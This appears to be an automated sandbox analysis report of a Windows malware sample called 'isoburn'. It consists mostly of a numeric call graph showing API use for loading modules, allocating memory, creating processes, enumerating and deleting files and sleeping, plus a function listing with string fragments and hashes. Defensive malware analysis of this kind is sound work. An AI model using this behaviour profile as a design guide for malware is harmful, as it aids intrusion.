98215->98217 98216 2ed75f0 2 API calls 98218 2edd9c1 98216->98218 98217->98216 98219 2edd9c8 98218->98219 98221 2edd500 98218->98221 98222 2edd523 98221->98222 98223 2ee1d30 3 API calls 98222->98223 98224 2edd530 98223->98224 98225 2edd585 98224->98225 98226 2edd54f 98224->98226 98227 2edd591 98224->98227 98225->98218 98228 2edd574 98226->98228 98229 2edd557 98226->98229 98232 2ed4400 LdrLoadDll 98227->98232 98231 2ee6fb0 2 API calls 98228->98231 98230 2ee6fb0 2 API calls 98229->98230 98233 2edd568 98230->98233 98231->98225 98234 2edd5b3 98232->98234 98233->98218 98235 2edc840 2 API calls 98234->98235 98236 2edd5d5 98235->98236 98240 2edd5ed 98236->98240 98242 2edd6d8 98236->98242 98237 2edd6bf 98238 2ee6fb0 2 API calls 98237->98238 98239 2edd7e3 98238->98239 98239->98218 98240->98237 98244 2edce60 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98240->98244 98242->98237 98245 2edce60 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98242->98245 98244->98240 98245->98242 98246 2edf120 98247 2edf13d 98246->98247 98248 2ed4120 LdrLoadDll 98247->98248 98249 2edf15b 98248->98249 98250 2ee0b80 LdrLoadDll 98249->98250 98267 2edf35b 98249->98267 98251 2edf187 98250->98251 98252 2ee0b80 LdrLoadDll 98251->98252 98253 2edf1a0 98252->98253 98254 2ee0b80 LdrLoadDll 98253->98254 98255 2edf1b9 98254->98255 98256 2ee0b80 LdrLoadDll 98255->98256 98257 2edf1d5 98256->98257 98258 2ee0b80 LdrLoadDll 98257->98258 98259 2edf1ee 98258->98259 98260 2ee0b80 LdrLoadDll 98259->98260 98261 2edf207 98260->98261 98262 2ee0b80 LdrLoadDll 98261->98262 98263 2edf223 98262->98263 98264 2ee0b80 LdrLoadDll 98263->98264 98265 2edf23c 98264->98265 98266 2ee0b80 LdrLoadDll 98265->98266 98268 2edf254 98266->98268 98268->98267 98270 2edece0 LdrLoadDll 98268->98270 98270->98268 98271 2ed0920 98272 2ed093a 98271->98272 98273 2ed4120 LdrLoadDll 98272->98273 98274 2ed0958 98273->98274 98275 2ee0b80 LdrLoadDll 98274->98275 98276 2ed096e 98275->98276 98277 2ed098c PostThreadMessageW 98276->98277 98278 2ed099d 98276->98278 98277->98278 98279 2ee4fe0 98280 2ee4ffd 98279->98280 98281 2ee6190 LdrLoadDll 98280->98281 98282 2ee500e 98281->98282 98285 5442af0 LdrInitializeThunk 98282->98285 98283 2ee5039 98285->98283 98286 5442ad0 LdrInitializeThunk 98287 2ed8b71 98295 2ed8b80 98287->98295 98288 2ed8b87 98289 2ee0b80 LdrLoadDll 98289->98295 98290 2ed8c6f GetFileAttributesW 98290->98295 98291 2ed8e1a 98292 2ed8e33 98291->98292 98293 2ee6fb0 2 API calls 98291->98293 98293->98292 98294 2ed4400 LdrLoadDll 98294->98295 98295->98288 98295->98289 98295->98290 98295->98291 98295->98294 98296 2edc840 2 API calls 98295->98296 98299 2ee1a60 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98295->98299 98300 2ee1900 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98295->98300 98296->98295 98299->98295 98300->98295 98301 2ed6870 98302 2ed688c 98301->98302 98305 2ed696f 98301->98305 98303 2ee5180 2 API calls 98302->98303 98302->98305 98304 2ed68a7 98303->98304 98315 2ed5eb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98304->98315 98306 2ed6a08 98305->98306 98316 2ed5eb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98305->98316 98309 2ed69e2 98309->98306 98317 2ed6080 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98309->98317 98311 2ed68df 98312 2ed4400 LdrLoadDll 98311->98312 98313 2ed690c 98312->98313 98314 2ed4400 LdrLoadDll 98313->98314 98314->98305 98315->98311 98316->98309 98317->98306 98318 2ed53b0 98320 2ed53e0 98318->98320 98323 2ed73a0 98318->98323 98322 2ed540c 98320->98322 98327 2ed7320 98320->98327 98324 2ed73b3 98323->98324 98335 2ee4810 98324->98335 98326 2ed73de 98326->98320 98345 2ee44e0 98327->98345 98329 2ed7364 98334 2ed7385 98329->98334 98352 2ee4670 98329->98352 98331 2ed7375 98332 2ed7391 98331->98332 98333 2ee5180 2 API calls 98331->98333 98332->98320 98333->98334 98334->98320 98336 2ee4866 98335->98336 98337 2ee4834 98335->98337 98338 2ee6190 LdrLoadDll 98336->98338 98339 2ee6190 LdrLoadDll 98337->98339 98340 2ee487c 98338->98340 98341 2ee484e 98339->98341 98344 5442dd0 LdrInitializeThunk 98340->98344 98341->98326 98342 2ee488b 98342->98326 98344->98342 98346 2ee453b 98345->98346 98347 2ee4501 98345->98347 98349 2ee6190 LdrLoadDll 98346->98349 98348 2ee6190 LdrLoadDll 98347->98348 98350 2ee451b 98348->98350 98351 2ee4551 98349->98351 98350->98329 98351->98329 98353 2ee46c6 98352->98353 98354 2ee4694 98352->98354 98356 2ee6190 LdrLoadDll 98353->98356 98355 2ee6190 LdrLoadDll 98354->98355 98357 2ee46ae 98355->98357 98358 2ee46dc 98356->98358 98357->98331 98361 5444650 LdrInitializeThunk 98358->98361 98359 2ee46eb 98359->98331 98361->98359 98362 2ee06f0 98363 2ee070c 98362->98363 98374 2ee4e70 98363->98374 98366 2ee0748 98369 2ee5180 2 API calls 98366->98369 98367 2ee0734 98368 2ee5180 2 API calls 98367->98368 98370 2ee073d 98368->98370 98371 2ee0751 98369->98371 98378 2ee70d0 98371->98378 98373 2ee075c 98375 2ee4e8d 98374->98375 98376 2ee6190 LdrLoadDll 98375->98376 98377 2ee072d 98376->98377 98377->98366 98377->98367 98379 2ee5440 2 API calls 98378->98379 98380 2ee70ed 98379->98380 98380->98373 98381 2ee80f0 98382 2ee6fb0 2 API calls 98381->98382 98383 2ee8105 98382->98383 98384 2ee36b0 98385 2ee370a 98384->98385 98387 2ee3717 98385->98387 98388 2ed6ac0 98385->98388 98389 2ed6a65 98388->98389 98390 2ed6ae2 98388->98390 98391 2eda0f0 LdrLoadDll 98389->98391 98392 2ed6a9c 98391->98392 98393 2ed6ab2 98392->98393 98395 2eda380 98392->98395 98393->98387 98396 2eda3a6 98395->98396 98397 2ee0b80 LdrLoadDll 98396->98397 98399 2eda3fa 98397->98399 98398 2eda773 98398->98393 98399->98398 98442 2ee5520 98399->98442 98401 2eda44b 98402 2eda75b 98401->98402 98446 2ee81c0 98401->98446 98403 2ee6fb0 2 API calls 98402->98403 98403->98398 98405 2eda46a 98405->98402 98406 2eda573 98405->98406 98452 2ee48e0 98405->98452 98462 2ed5440 LdrLoadDll LdrInitializeThunk LdrInitializeThunk 98406->98462 98410 2eda59e 98410->98402 98414 2ed5330 2 API calls 98410->98414 98419 2eda5d3 98410->98419 98411 2eda4f9 98411->98398 98417 2eda528 98411->98417 98423 2eda559 98411->98423 98458 2ed5330 98411->98458 98412 2ee6fb0 2 API calls 98416 2eda569 98412->98416 98414->98419 98415 2ee5180 2 API calls 98418 2eda538 98415->98418 98416->98393 98417->98415 98463 2ee26d0 LdrLoadDll LdrInitializeThunk 98418->98463 98421 2eda73a 98419->98421 98422 2eda603 98419->98422 98425 2ee6fb0 2 API calls 98421->98425 98464 2ee5220 98422->98464 98423->98412 98426 2eda751 98425->98426 98426->98393 98427 2eda622 98473 2ed71d0 98427->98473 98429 2eda68b 98429->98402 98430 2eda696 98429->98430 98431 2ee6fb0 2 API calls 98430->98431 98432 2eda6ba 98431->98432 98480 2ee4b40 98432->98480 98436 2eda6f5 98437 2eda6fc 98436->98437 98438 2ee4b40 2 API calls 98436->98438 98437->98393 98439 2eda722 98438->98439 98495 2ee46f0 98439->98495 98441 2eda730 98441->98393 98443 2ee553d 98442->98443 98444 2ee6190 LdrLoadDll 98443->98444 98445 2ee554e CreateProcessInternalW 98444->98445 98445->98401 98447 2ee8130 98446->98447 98448 2ee818d 98447->98448 98449 2ee7090 2 API calls 98447->98449 98448->98405 98450 2ee816a 98449->98450 98451 2ee6fb0 2 API calls 98450->98451 98451->98448 98453 2ee48fd 98452->98453 98454 2ee6190 LdrLoadDll 98453->98454 98455 2ee490e 98454->98455 98504 5442c0a 98455->98504 98456 2eda4f1 98456->98406 98456->98411 98459 2ed5333 98458->98459 98460 2ee4a80 2 API calls 98459->98460 98461 2ed536e 98460->98461 98461->98417 98462->98410 98463->98423 98465 2ee5282 98464->98465 98466 2ee5244 98464->98466 98467 2ee6190 LdrLoadDll 98465->98467 98468 2ee6190 LdrLoadDll 98466->98468 98469 2ee5298 98467->98469 98471 2ee525e 98468->98471 98507 5442e80 LdrInitializeThunk 98469->98507 98470 2ee52b3 98470->98427 98471->98427 98474 2ed71ed 98473->98474 98508 2ee49d0 98474->98508 98476 2ed723d 98477 2ed7244 98476->98477 98478 2ee4a80 2 API calls 98476->98478 98477->98429 98479 2ed726d 98478->98479 98479->98429 98481 2ee4b5a 98480->98481 98482 2ee6190 LdrLoadDll 98481->98482 98483 2ee4b6b 98482->98483 98518 5442d30 LdrInitializeThunk 98483->98518 98484 2eda6ce 98486 2ee4a80 98484->98486 98487 2ee4af3 98486->98487 98488 2ee4aa1 98486->98488 98489 2ee6190 LdrLoadDll 98487->98489 98490 2ee6190 LdrLoadDll 98488->98490 98491 2ee4b09 98489->98491 98492 2ee4abb 98490->98492 98519 5442d10 LdrInitializeThunk 98491->98519 98492->98436 98493 2ee4b38 98493->98436 98496 2ee4746 98495->98496 98497 2ee4714 98495->98497 98498 2ee6190 LdrLoadDll 98496->98498 98499 2ee6190 LdrLoadDll 98497->98499 98500 2ee475c 98498->98500 98501 2ee472e 98499->98501 98520 5442fb0 LdrInitializeThunk 98500->98520 98501->98441 98502 2ee476b 98502->98441 98505 5442c1f LdrInitializeThunk 98504->98505 98506 5442c11 98504->98506 98505->98456 98506->98456 98507->98470 98509 2ee4a37 98508->98509 98510 2ee49f1 98508->98510 98512 2ee6190 LdrLoadDll 98509->98512 98511 2ee6190 LdrLoadDll 98510->98511 98514 2ee4a0b 98511->98514 98513 2ee4a4d 98512->98513 98517 5442f30 LdrInitializeThunk 98513->98517 98514->98476 98515 2ee4a70 98515->98476 98517->98515 98518->98484 98519->98493 98520->98502 98521 2ee3eb0 98522 2ee3f0a 98521->98522 98524 2ee3f17 98522->98524 98525 2ee2450 98522->98525 98526 2ee6f20 2 API calls 98525->98526 98528 2ee2491 98526->98528 98527 2ee2596 98527->98524 98528->98527 98529 2ed4120 LdrLoadDll 98528->98529 98530 2ee24d7 98529->98530 98531 2ee0b80 LdrLoadDll 98530->98531 98533 2ee24fc 98531->98533 98532 2ee2510 Sleep 98532->98533 98533->98527 98533->98532 98534 2ee4770 98535 2ee4791 98534->98535 98536 2ee47cf 98534->98536 98537 2ee6190 LdrLoadDll 98535->98537 98538 2ee6190 LdrLoadDll 98536->98538 98539 2ee47ab 98537->98539 98540 2ee47e5 98538->98540 98543 5442ee0 LdrInitializeThunk 98540->98543 98541 2ee4800 98543->98541 98544 2ed24cc 98545 2ed250b 98544->98545 98547 2ed24d3 98544->98547 98546 2ed5c20 3 API calls 98545->98546 98549 2ed2533 98545->98549 98546->98549 98548 2ed4120 LdrLoadDll 98547->98548 98548->98545 98552 2ec99c0 98555 2ec9ef3 98552->98555 98554 2eca31e 98555->98554 98556 2ee6c40 98555->98556 98557 2ee6c66 98556->98557 98564 2ed3050 98557->98564 98559 2ee6c72 98560 2ee6ca0 98559->98560 98567 2ee34f0 98559->98567 98571 2ee54e0 LdrLoadDll 98560->98571 98563 2ee6cb1 98563->98554 98566 2ed305d 98564->98566 98572 2ed2fa0 98564->98572 98566->98559 98568 2ee354a 98567->98568 98570 2ee3557 98568->98570 98597 2ed1f10 98568->98597 98570->98560 98571->98563 98579 2ee2040 98572->98579 98576 2ed2fc3 98578 2ed2fd0 98576->98578 98586 2ee5b20 98576->98586 98578->98566 98580 2ee204f 98579->98580 98581 2ee0b80 LdrLoadDll 98580->98581 98582 2ed2fb7 98581->98582 98583 2ee20a0 98582->98583 98593 2ee5400 98583->98593 98588 2ee5b38 98586->98588 98587 2ee5b5c 98587->98578 98588->98587 98589 2ee48e0 2 API calls 98588->98589 98590 2ee5bb1 98589->98590 98591 2ee6fb0 2 API calls 98590->98591 98592 2ee5bc7 98591->98592 98592->98578 98594 2ee541a 98593->98594 98595 2ee6190 LdrLoadDll 98594->98595 98596 2ee20bd 98595->98596 98596->98576 98598 2ed1f29 98597->98598 98615 2ed7140 98598->98615 98600 2ed1f50 98601 2ed21a9 98600->98601 98602 2ee7090 2 API calls 98600->98602 98601->98570 98603 2ed1f66 98602->98603 98604 2ee7090 2 API calls 98603->98604 98605 2ed1f77 98604->98605 98606 2ee7090 2 API calls 98605->98606 98607 2ed1f88 98606->98607 98627 2ed5770 98607->98627 98609 2ed1ff0 98614 2ed201b 98609->98614 98657 2ed6380 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98609->98657 98611 2ed1f95 98611->98609 98656 2ed58f0 LdrLoadDll 98611->98656 98637 2ed1a10 98614->98637 98616 2ed716c 98615->98616 98658 2ed44b0 98616->98658 98618 2ed717e 98662 2ed7030 98618->98662 98621 2ed7199 98623 2ee5180 2 API calls 98621->98623 98624 2ed71a4 98621->98624 98622 2ed71b1 98625 2ee5180 2 API calls 98622->98625 98626 2ed71c2 98622->98626 98623->98624 98624->98600 98625->98626 98626->98600 98628 2ed5786 98627->98628 98629 2ed5790 98627->98629 98628->98611 98630 2ed4400 LdrLoadDll 98629->98630 98631 2ed5829 98630->98631 98632 2ed4340 LdrLoadDll 98631->98632 98634 2ed583d 98632->98634 98633 2ed5863 98633->98611 98634->98633 98635 2ed4400 LdrLoadDll 98634->98635 98636 2ed588a 98635->98636 98636->98611 98683 2ed7400 98637->98683 98639 2ed1a2a 98649 2ed1ef8 98639->98649 98689 2ee0090 98639->98689 98641 2ed1a88 98641->98649 98692 2ee8090 98641->98692 98643 2ed1c31 98644 2ee81c0 3 API calls 98643->98644 98645 2ed1c46 98644->98645 98652 2ed1c5c 98645->98652 98697 2ed01f0 98645->98697 98646 2ed01f0 4 API calls 98646->98652 98648 2ed73a0 2 API calls 98648->98652 98649->98601 98650 2ed1d13 98650->98652 98710 2ed04b0 98650->98710 98652->98646 98652->98648 98652->98649 98654 2ed04b0 2 API calls 98652->98654 98653 2ed73a0 LdrLoadDll LdrInitializeThunk 98655 2ed1d8a 98653->98655 98654->98652 98655->98652 98655->98653 98656->98609 98657->98614 98659 2ed44f6 98658->98659 98660 2ed4340 LdrLoadDll 98659->98660 98661 2ed4589 98660->98661 98661->98618 98663 2ed7126 98662->98663 98664 2ed704a 98662->98664 98663->98621 98663->98622 98665 2ed4400 LdrLoadDll 98664->98665 98666 2ed708f 98665->98666 98672 2ee4930 98666->98672 98668 2ed70d4 98676 2ee4980 98668->98676 98671 2ee5180 2 API calls 98671->98663 98673 2ee494d 98672->98673 98674 2ee6190 LdrLoadDll 98673->98674 98675 2ee495e 98674->98675 98675->98668 98677 2ee499d 98676->98677 98678 2ee6190 LdrLoadDll 98677->98678 98679 2ee49ae 98678->98679 98682 54435c0 LdrInitializeThunk 98679->98682 98680 2ed711a 98680->98671 98682->98680 98684 2ed7408 98683->98684 98685 2ee0b80 LdrLoadDll 98684->98685 98686 2ed7427 98685->98686 98687 2ed742e SetErrorMode 98686->98687 98688 2ed7435 98686->98688 98687->98688 98688->98639 98690 2ee6f20 2 API calls 98689->98690 98691 2ee00b1 98690->98691 98691->98641 98693 2ee80a6 98692->98693 98694 2ee80a0 98692->98694 98695 2ee7090 2 API calls 98693->98695 98694->98643 98696 2ee80cc 98695->98696 98696->98643 98698 2ed01fb 98697->98698 98699 2ed0200 98697->98699 98698->98650 98700 2ee6f20 2 API calls 98699->98700 98703 2ed0225 98700->98703 98701 2ed028c 98701->98650 98703->98701 98704 2ed0292 98703->98704 98707 2ee6f20 2 API calls 98703->98707 98713 2ee4890 98703->98713 98719 2ee53b0 98703->98719 98706 2ed02bc 98704->98706 98708 2ee53b0 2 API calls 98704->98708 98706->98650 98707->98703 98709 2ed02ad 98708->98709 98709->98650 98711 2ee53b0 2 API calls 98710->98711 98712 2ed04d2 98711->98712 98712->98655 98714 2ee48ad 98713->98714 98715 2ee6190 LdrLoadDll 98714->98715 98716 2ee48be 98715->98716 98725 5442df0 LdrInitializeThunk 98716->98725 98717 2ee48d5 98717->98703 98720 2ee53ca 98719->98720 98721 2ee6190 LdrLoadDll 98720->98721 98722 2ee53db 98721->98722 98726 5442c70 LdrInitializeThunk 98722->98726 98723 2ee53f2 98723->98703 98725->98717 98726->98723 98727 2ede840 98728 2ede8a4 98727->98728 98729 2ed4400 LdrLoadDll 98728->98729 98730 2ede997 98729->98730 98731 2ed5c20 3 API calls 98730->98731 98733 2ede9cd 98731->98733 98732 2ede9d4 98733->98732 98734 2ed4400 LdrLoadDll 98733->98734 98735 2edea10 98734->98735 98736 2ed5d30 2 API calls 98735->98736 98738 2edea50 98736->98738 98737 2edeb73 98738->98737 98739 2edeb82 98738->98739 98761 2ede620 98738->98761 98740 2ee5180 2 API calls 98739->98740 98742 2edeb8c 98740->98742 98743 2edea85 98743->98739 98744 2edea90 98743->98744 98745 2ee7090 2 API calls 98744->98745 98746 2edeab9 98745->98746 98747 2edead8 98746->98747 98748 2edeac2 98746->98748 98790 2ede510 CoInitialize 98747->98790 98749 2ee5180 2 API calls 98748->98749 98751 2edeacc 98749->98751 98752 2edeae6 98792 2ee4ce0 98752->98792 98754 2edeb62 98755 2ee5180 2 API calls 98754->98755 98756 2edeb6c 98755->98756 98758 2ee6fb0 2 API calls 98756->98758 98758->98737 98759 2edeb04 98759->98754 98760 2ee4ce0 2 API calls 98759->98760 98798 2ede440 LdrLoadDll RtlFreeHeap 98759->98798 98760->98759 98762 2ede63c 98761->98762 98763 2ed4120 LdrLoadDll 98762->98763 98765 2ede65a 98763->98765 98764 2ede663 98764->98743 98765->98764 98766 2ee0b80 LdrLoadDll 98765->98766 98767 2ede680 98766->98767 98768 2ee0b80 LdrLoadDll 98767->98768 98769 2ede69b 98768->98769 98770 2ee0b80 LdrLoadDll 98769->98770 98771 2ede6b4 98770->98771 98772 2ee0b80 LdrLoadDll 98771->98772 98773 2ede6d0 98772->98773 98774 2ee0b80 LdrLoadDll 98773->98774 98775 2ede6e9 98774->98775 98776 2ee0b80 LdrLoadDll 98775->98776 98777 2ede702 98776->98777 98778 2ed4120 LdrLoadDll 98777->98778 98780 2ede72e 98778->98780 98779 2ede7dd 98779->98743 98780->98779 98781 2ee0b80 LdrLoadDll 98780->98781 98782 2ede753 98781->98782 98783 2ed4120 LdrLoadDll 98782->98783 98784 2ede788 98783->98784 98784->98779 98785 2ee0b80 LdrLoadDll 98784->98785 98786 2ede7ab 98785->98786 98787 2ee0b80 LdrLoadDll 98786->98787 98788 2ede7c4 98787->98788 98789 2ee0b80 LdrLoadDll 98788->98789 98789->98779 98791 2ede575 98790->98791 98791->98752 98793 2ee4cfa 98792->98793 98794 2ee6190 LdrLoadDll 98793->98794 98795 2ee4d0b 98794->98795 98799 5442ba0 LdrInitializeThunk 98795->98799 98796 2ee4d2a 98796->98759 98798->98759 98799->98796 98800 2edc3c0 98801 2edc3e2 98800->98801 98802 2ed4400 LdrLoadDll 98801->98802 98803 2edc5d3 98802->98803 98804 2ed4400 LdrLoadDll 98803->98804 98805 2edc5f8 98804->98805 98806 2ed4340 LdrLoadDll 98805->98806 98807 2edc60c 98806->98807 98831 2edc280 98807->98831 98810 2edc280 6 API calls 98811 2edc682 98810->98811 98812 2edc280 6 API calls 98811->98812 98813 2edc69a 98812->98813 98814 2edc280 6 API calls 98813->98814 98815 2edc6b2 98814->98815 98816 2edc280 6 API calls 98815->98816 98817 2edc6cd 98816->98817 98818 2edc280 6 API calls 98817->98818 98820 2edc6e5 98818->98820 98819 2edc6ff 98820->98819 98821 2edc280 6 API calls 98820->98821 98822 2edc733 98821->98822 98823 2edc280 6 API calls 98822->98823 98824 2edc770 98823->98824 98825 2edc280 6 API calls 98824->98825 98826 2edc7ad 98825->98826 98827 2edc280 6 API calls 98826->98827 98828 2edc7ea 98827->98828 98829 2edc280 6 API calls 98828->98829 98830 2edc827 98829->98830 98832 2edc2a9 98831->98832 98833 2ee0b80 LdrLoadDll 98832->98833 98834 2edc2e9 98833->98834 98835 2ee0b80 LdrLoadDll 98834->98835 98836 2edc307 98835->98836 98837 2ee0b80 LdrLoadDll 98836->98837 98839 2edc329 98837->98839 98838 2edc3ad 98838->98810 98839->98838 98840 2edc353 FindFirstFileW 98839->98840 98840->98838 98841 2edc36e 98840->98841 98842 2edc394 FindNextFileW 98841->98842 98845 2edc190 6 API calls 98841->98845 98842->98841 98843 2edc3a6 FindClose 98842->98843 98843->98838 98845->98841 98846 2ee0a80 98850 2ee0a8f 98846->98850 98847 2ee0ad3 98848 2ee6fb0 2 API calls 98847->98848 98849 2ee0ae3 98848->98849 98850->98847 98851 2ee0b11 98850->98851 98853 2ee0b16 98850->98853 98852 2ee6fb0 2 API calls 98851->98852 98852->98853 98854 2ee5100 98855 2ee5152 98854->98855 98856 2ee5124 98854->98856 98857 2ee6190 LdrLoadDll 98855->98857 98858 2ee6190 LdrLoadDll 98856->98858 98860 2ee5168 NtDeleteFile 98857->98860 98859 2ee513e 98858->98859 98861 2ed2e9c 98862 2ed7030 3 API calls 98861->98862 98863 2ed2eac 98862->98863 98864 2ed2eda 98863->98864 98865 2ed2ec1 98863->98865 98867 2ee5180 2 API calls 98863->98867 98869 2ecf910 LdrLoadDll 98865->98869 98867->98865 98868 2ed2ecb 98869->98868 98871 2ed54d8 98872 2ed546d 98871->98872 98873 2ed54db 98871->98873 98874 2ee48e0 2 API calls 98872->98874 98875 2ed5476 98874->98875 98876 2ee5220 2 API calls 98875->98876 98877 2ed548b 98876->98877 98878 2ed66d0 98879 2ed66fe 98878->98879 98880 2ed71d0 3 API calls 98879->98880 98881 2ed6726 98880->98881 98882 2ed672d 98881->98882 98883 2ee70d0 2 API calls 98881->98883 98884 2ed673d 98883->98884 98885 2ed4c50 98888 2ed4c7a 98885->98888 98886 2ed50e8 98887 2ee0090 2 API calls 98889 2ed4d19 98887->98889 98888->98886 98888->98887 98889->98886 98911 2ed0a50 9 API calls 98889->98911 98891 2ed4d87 98891->98886 98892 2ee6fb0 2 API calls 98891->98892 98894 2ed4d9f 98892->98894 98893 2ed4dd1 98895 2ed71d0 3 API calls 98893->98895 98899 2ed4dd8 98893->98899 98894->98893 98930 2ec39f0 LdrLoadDll LdrInitializeThunk 98894->98930 98896 2ed4e11 98895->98896 98896->98886 98898 2ee4a80 2 API calls 98896->98898 98898->98899 98899->98886 98912 2ee4570 98899->98912 98901 2ed4e6e 98921 2ee45f0 98901->98921 98903 2ed5077 98906 2ee46f0 2 API calls 98903->98906 98907 2ed509a 98903->98907 98904 2ed4e8e 98904->98903 98931 2ec3a60 LdrLoadDll LdrInitializeThunk 98904->98931 98906->98907 98908 2ed73a0 2 API calls 98907->98908 98909 2ed50b7 98907->98909 98908->98907 98932 2ee54e0 LdrLoadDll 98909->98932 98911->98891 98913 2ee4591 98912->98913 98914 2ee45c3 98912->98914 98915 2ee6190 LdrLoadDll 98913->98915 98916 2ee6190 LdrLoadDll 98914->98916 98917 2ee45ab 98915->98917 98918 2ee45d9 98916->98918 98917->98901 98933 54439b0 LdrInitializeThunk 98918->98933 98919 2ee45e8 98919->98901 98922 2ee4646 98921->98922 98923 2ee4614 98921->98923 98924 2ee6190 LdrLoadDll 98922->98924 98925 2ee6190 LdrLoadDll 98923->98925 98926 2ee465c 98924->98926 98927 2ee462e 98925->98927 98934 5444340 LdrInitializeThunk 98926->98934 98927->98904 98928 2ee466b 98928->98904 98930->98893 98931->98903 98932->98886 98933->98919 98934->98928 98935 2ee4f10 98936 2ee4f8a 98935->98936 98937 2ee4f34 98935->98937 98938 2ee6190 LdrLoadDll 98936->98938 98939 2ee6190 LdrLoadDll 98937->98939 98941 2ee4fa0 NtCreateFile 98938->98941 98940 2ee4f4e 98939->98940 98942 2ee0251 98956 2ee5040 98942->98956 98944 2ee0272 98948 2ee0289 98944->98948 98963 2ee4e20 LdrLoadDll 98944->98963 98946 2ee02a5 98950 2ee5180 2 API calls 98946->98950 98947 2ee0290 98949 2ee5180 2 API calls 98947->98949 98948->98946 98948->98947 98951 2ee0299 98949->98951 98953 2ee02ae 98950->98953 98952 2ee02da 98953->98952 98954 2ee6fb0 2 API calls 98953->98954 98955 2ee02ce 98954->98955 98957 2ee5064 98956->98957 98958 2ee50b2 98956->98958 98960 2ee6190 LdrLoadDll 98957->98960 98959 2ee6190 LdrLoadDll 98958->98959 98961 2ee50c8 NtReadFile 98959->98961 98962 2ee507e 98960->98962 98961->98944 98962->98944 98963->98948

                                                                          Executed Functions

                                                                          Function 02EC99C0 Relevance: 53.0, Strings: 42, Instructions: 489COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 42 2ec99c0-2ec9ee9 43 2ec9ef3-2ec9efd 42->43 44 2ec9eff-2ec9f1a 43->44 45 2ec9f36-2ec9f3d 43->45 47 2ec9f1c-2ec9f20 44->47 48 2ec9f21-2ec9f23 44->48 46 2ec9f44-2ec9f5d 45->46 46->46 49 2ec9f5f-2ec9f69 46->49 47->48 50 2ec9f34 48->50 51 2ec9f25-2ec9f2e 48->51 52 2ec9f7a-2ec9f83 49->52 50->43 51->50 53 2ec9f99 52->53 54 2ec9f85-2ec9f97 52->54 55 2ec9fa0-2ec9fa7 53->55 54->52 57 2ec9fde-2ec9fe7 55->57 58 2ec9fa9-2ec9fdc 55->58 59 2ec9fed-2ec9ff7 57->59 60 2eca2b5-2eca2bc 57->60 58->55 61 2eca008-2eca014 59->61 62 2eca3d7-2eca3e1 60->62 63 2eca2c2-2eca2c6 60->63 66 2eca016-2eca022 61->66 67 2eca032-2eca035 61->67 64 2eca415-2eca41f 62->64 65 2eca3e3-2eca402 62->65 68 2eca2fe-2eca317 63->68 69 2eca2c8-2eca2fc 63->69 74 2eca421-2eca440 64->74 75 2eca452-2eca45c 64->75 70 2eca404-2eca40d 65->70 71 2eca413 65->71 76 2eca024-2eca02a 66->76 77 2eca030 66->77 72 2eca03b-2eca042 67->72 68->68 73 2eca319 call 2ee6c40 68->73 69->63 70->71 71->62 79 2eca044-2eca071 72->79 80 2eca073-2eca07d 72->80 85 2eca31e-2eca328 73->85 82 2eca450 74->82 83 2eca442-2eca44a 74->83 84 2eca46d-2eca479 75->84 76->77 77->61 79->72 86 2eca08e-2eca097 80->86 82->64 83->82 87 2eca48f-2eca499 84->87 88 2eca47b-2eca48d 84->88 89 2eca339-2eca345 85->89 90 2eca099-2eca0a5 86->90 91 2eca0a7-2eca0b1 86->91 88->84 94 2eca35b-2eca365 89->94 95 2eca347-2eca359 89->95 90->86 96 2eca0c2-2eca0ce 91->96 98 2eca376-2eca37d 94->98 95->89 99 2eca0de-2eca0e8 96->99 100 2eca0d0-2eca0dc 96->100 102 2eca37f-2eca3a4 98->102 103 2eca3a6-2eca3b0 98->103 104 2eca0f9-2eca105 99->104 100->96 102->98 106 2eca3c1-2eca3ca 103->106 107 2eca11c-2eca126 104->107 108 2eca107-2eca11a 104->108 106->62 111 2eca3cc-2eca3d5 106->111 109 2eca137-2eca143 107->109 108->104 112 2eca159-2eca163 109->112 113 2eca145-2eca157 109->113 111->106 116 2eca174-2eca17d 112->116 113->109 117 2eca17f-2eca191 116->117 118 2eca193-2eca1a2 116->118 117->116 120 2eca1a8-2eca1b2 118->120 121 2eca28b-2eca2a4 118->121 122 2eca1c3-2eca1cf 120->122 121->121 123 2eca2a6-2eca2b0 121->123 124 2eca1e1-2eca1eb 122->124 125 2eca1d1-2eca1d7 122->125 123->57 128 2eca1fc-2eca205 124->128 126 2eca1df 125->126 127 2eca1d9-2eca1dc 125->127 126->122 127->126 129 2eca215-2eca21f 128->129 130 2eca207-2eca213 128->130 132 2eca230-2eca239 129->132 130->128 134 2eca23b-2eca244 132->134 135 2eca251-2eca258 132->135 136 2eca24f 134->136 137 2eca246-2eca24c 134->137 138 2eca289 135->138 139 2eca25a-2eca287 135->139 136->132 137->136 138->60 139->135
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$'$,$,i$/$/a$1$2$8W$9$9$@F$DN$E$E$H$H%$L&$N$OW$P$Q$Rf$T$Ut$V$V>$YC$\1$\b$]$]$^$^C$`!$cF$h$ls$m$D$P$a\b
                                                                          • API String ID: 0-2954206845
                                                                          • Opcode ID: 7bb0eb9fc51504e8f0df5f11d87c5573e519a5e9ea5ee8551a2a0024a50f4def
                                                                          • Instruction ID: 123bd0e4768bbff1a555b3f1b240360a7de0a4ade2f6ccb5713857d42d1d14ce
                                                                          • Opcode Fuzzy Hash: 7bb0eb9fc51504e8f0df5f11d87c5573e519a5e9ea5ee8551a2a0024a50f4def
                                                                          • Instruction Fuzzy Hash: 9C52BFB0D45669CBEB24CF85C9987EDBBB1BB45308F2091D9D40D6B380C7BA5A89CF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EDC280 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
